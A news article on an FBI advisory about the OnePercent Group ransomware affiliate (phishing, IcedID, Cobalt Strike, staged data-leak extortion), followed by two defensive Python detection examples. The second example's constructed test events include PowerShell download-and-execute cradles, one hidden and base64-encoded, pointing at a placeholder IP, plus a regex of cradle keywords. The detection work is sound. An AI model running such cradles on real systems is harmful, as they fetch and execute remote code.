Ransomware: One Percent Makes A Big Impact

The US Federal Bureau of Investigation (FBI) has published its first public advisory detailing the modus operandi of a ransomware affiliate. The warning concerns a criminal gang calling itself OnePercent Group, which has been targeting companies in the US since November 2020.

The group's method is to use the threat emulation software Cobalt Strike to carry out ransomware attacks. The infection process begins in the victim's inbox.

"OnePercent Group actors compromised victims through a phishing email in which an attachment is opened by the user," states the FBI warning. "The attachment's macros infect the system with the IcedID banking trojan."

The FBI warning describes OnePercent as a 'ransomware affiliate': a person or group that rents access to a Ransomware-as-a-Service (RaaS) platform, orchestrates intrusions into corporate networks, encrypts files with the rented ransomware and then earns a commission from successful extortions.

The malicious attachment appears as a zip file containing a Microsoft Word or Excel document. Once the document's macros run, the IcedID trojan downloads further tooling onto the victim's computer, including Cobalt Strike, which the FBI said "moves laterally in the network, primarily with PowerShell remoting."
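The lure described above (a zip wrapping an Office document that carries a macro) can be caught at the mail gateway by looking inside the attachment rather than trusting its extension. The following is an added example written for this page, not code from the FBI advisory or from the article's sources. It unpacks a zip attachment in memory, identifies each member by magic bytes, and reports whether an OOXML document contains a VBA project (the vbaProject.bin member that Word, Excel and PowerPoint store in macro-enabled files). Legacy binary .doc/.xls files are OLE2 containers whose macro streams need an OLE parser, so they are marked for review rather than guessed at. The sample attachment, its file names and its contents are constructed for the demonstration; one document is deliberately given a plain .doc name to show why an extension filter alone is not enough.

```python
"""Added example (not from the advisory): flag zip attachments that wrap
macro-carrying Office documents, deciding by content rather than extension."""
import io
import zipfile

# OOXML (docx/xlsx/docm/xlsm/...) files are zip packages; a VBA project lives
# in one of these members regardless of what the file is called.
VBA_MEMBERS = {"word/vbaProject.bin", "xl/vbaProject.bin", "ppt/vbaProject.bin"}
ZIP_MAGIC = b"PK\x03\x04"
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # legacy .doc/.xls container
MAX_MEMBER_BYTES = 20 * 1024 * 1024              # refuse to inflate anything larger


def inspect_office_blob(name: str, data: bytes) -> dict:
    """Classify one file by its magic bytes; 'macros' is True/False for OOXML,
    None when the format needs a deeper parser (OLE2) or is corrupt."""
    if data.startswith(ZIP_MAGIC):
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as doc:
                members = set(doc.namelist())
        except zipfile.BadZipFile:
            return {"name": name, "kind": "corrupt", "macros": None}
        return {"name": name, "kind": "ooxml", "macros": bool(members & VBA_MEMBERS)}
    if data.startswith(OLE_MAGIC):
        # Binary Office file: macro streams require an OLE parser (e.g. oletools).
        return {"name": name, "kind": "ole2", "macros": None}
    return {"name": name, "kind": "other", "macros": False}


def scan_zip_attachment(data: bytes):
    """Return (verdict, findings) for a zip attachment held in memory."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as outer:
        for info in outer.infolist():
            if info.is_dir():
                continue
            if info.file_size > MAX_MEMBER_BYTES:      # decompression-bomb guard
                findings.append({"name": info.filename, "kind": "oversized", "macros": None})
                continue
            findings.append(inspect_office_blob(info.filename, outer.read(info.filename)))
    if any(f["macros"] for f in findings):
        verdict = "block"                        # a macro project was found
    elif any(f["macros"] is None for f in findings):
        verdict = "review"                       # OLE2/corrupt/oversized: needs a closer look
    else:
        verdict = "allow"
    return verdict, findings


def _ooxml(parts: dict) -> bytes:
    """Build a minimal OOXML-shaped zip package (constructed test data)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        for path, body in parts.items():
            z.writestr(path, body)
    return buf.getvalue()


def build_sample_lure() -> bytes:
    """Constructed sample: a macro-carrying document saved under a plain .doc
    name, plus a benign .docx, both inside one zip as in the OnePercent lure."""
    macro_doc = _ooxml({"word/document.xml": "<w:document/>",
                        "word/vbaProject.bin": b"\x00" * 16})
    clean_doc = _ooxml({"word/document.xml": "<w:document/>"})
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("invoice_4421.doc", macro_doc)
        z.writestr("notes.docx", clean_doc)
    return buf.getvalue()


if __name__ == "__main__":
    verdict, findings = scan_zip_attachment(build_sample_lure())
    print("verdict:", verdict)
    for f in findings:
        print(f)
```

The "review" verdict exists because a binary .doc or .xls cannot be cleared by this check alone; in practice that branch hands the file to an OLE-aware scanner or simply blocks it, since there is rarely a business reason to accept legacy Office formats inside zip attachments.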

The extortion/data leak typically follows these steps:

Leak Warning: After initially gaining access to a victim network, OnePercent Group actors leave a ransom note stating the data has been encrypted and exfiltrated. The note states the victim needs to contact the OnePercent Group actors on TOR or the victim data will be leaked. If the victim does not make prompt communication within a week of infection, the OnePercent Group actors follow up with emails and phone calls to the victim stating the data will be leaked.

One Percent Leak: If the victim does not pay the ransom quickly, the OnePercent Group actors threaten to release a portion of the stolen data to various clearnet websites.

Full Leak: If the ransom is not paid in full after the "one percent leak", OnePercent Group actors threaten to sell the stolen data to the Sodinokibi Group to publish at an auction.

The FBI said that OnePercent Group threat actors have been observed inside a victim's network around a month before ransomware is deployed. The FBI urges US companies to back up their critical data offline and to use multi-factor authentication with strong passphrases to protect themselves from ransomware attacks.
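A month of dwell time is a long window in which the lateral movement the FBI describes (Cobalt Strike driving PowerShell remoting) can be caught. The following is an added example for this page, not code from the advisory, showing one way to surface that activity from process-creation telemetry. On the target of a remote PowerShell session the commands run as children of wsmprovhost.exe, the WinRM plug-in host, and Cobalt Strike's PowerShell-based lateral movement typically passes a base64-encoded, UTF-16LE script that contains a download-and-execute cradle. Because legitimate administrators use remoting too, the rule only alerts when the remoting signal is paired with a second one. The events below use Sysmon Event ID 1 field names but are constructed; the host names, user names and URLs are invented for the demonstration.

```python
"""Added example (not from the advisory): flag PowerShell remoting sessions
that carry encoded or download-and-execute command lines, using constructed
Sysmon-style process-creation events."""
import base64
import re

REMOTE = "child of wsmprovhost.exe (remote PowerShell session host)"
ENCODED = "encoded command line"
CRADLE = "download/execute cradle"

# Strings that almost always mean "fetch and run something" in PowerShell.
SUSPICIOUS = re.compile(
    r"IEX|Invoke-Expression|DownloadString|FromBase64String|Net\.WebClient", re.I)
# -e / -ec / -enc / -EncodedCommand followed by the base64 payload.
ENC_FLAG = re.compile(
    r"(?:^|\s)[-/](?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)


def encode_ps(script: str) -> str:
    """PowerShell's -EncodedCommand expects base64 of the UTF-16LE script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded script if the command line carries -enc, else None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):   # malformed base64 or not UTF-16
        return None


def score_event(ev: dict) -> list:
    """Collect the independent signals present in one process-creation event."""
    reasons = []
    if ev["ParentImage"].lower().endswith("\\wsmprovhost.exe"):
        reasons.append(REMOTE)
    decoded = decode_encoded_command(ev["CommandLine"])
    if decoded is not None:
        reasons.append(ENCODED)
    # Search both the raw command line and the decoded script.
    if SUSPICIOUS.search(ev["CommandLine"] + " " + (decoded or "")):
        reasons.append(CRADLE)
    return reasons


def find_remoting_lateral_movement(events: list) -> list:
    """Alert only when remoting is combined with at least one more signal,
    so routine administrative remoting does not page anyone."""
    alerts = []
    for ev in events:
        reasons = score_event(ev)
        if REMOTE in reasons and len(reasons) > 1:
            alerts.append({"Computer": ev["Computer"], "User": ev["User"], "reasons": reasons})
    return alerts


# Constructed sample telemetry (Sysmon Event ID 1 fields, simplified).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    # 1. Remote session running an encoded download cradle: this is the alert.
    {"Computer": "FS01", "User": r"CORP\svc_backup", "Image": PS,
     "ParentImage": r"C:\Windows\System32\wsmprovhost.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + encode_ps(
         "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a')")},
    # 2. Remote session used for ordinary administration: remoting only, no alert.
    {"Computer": "FS01", "User": r"CORP\it-admin", "Image": PS,
     "ParentImage": r"C:\Windows\System32\wsmprovhost.exe",
     "CommandLine": 'powershell.exe -NoProfile -Command "Get-Service -Name Spooler"'},
    # 3. Local cradle launched from Explorer: suspicious, but not lateral movement.
    {"Computer": "WS12", "User": r"CORP\j.doe", "Image": PS,
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -nop -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://192.0.2.10/x')\""},
]

if __name__ == "__main__":
    for alert in find_remoting_lateral_movement(EVENTS):
        print(alert)
```

Event 3 still deserves its own rule (the cradle is a strong indicator on its own); it is left out of this alert list only to keep the example focused on the remoting pattern the advisory names. Pairing this with Windows Security logon events (network logons from a workstation to many servers within minutes) tightens it further, and none of it replaces the offline backups and MFA the FBI recommends.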

Sources: IC3, Bleeping Computer, The Record, Infosecurity Magazine

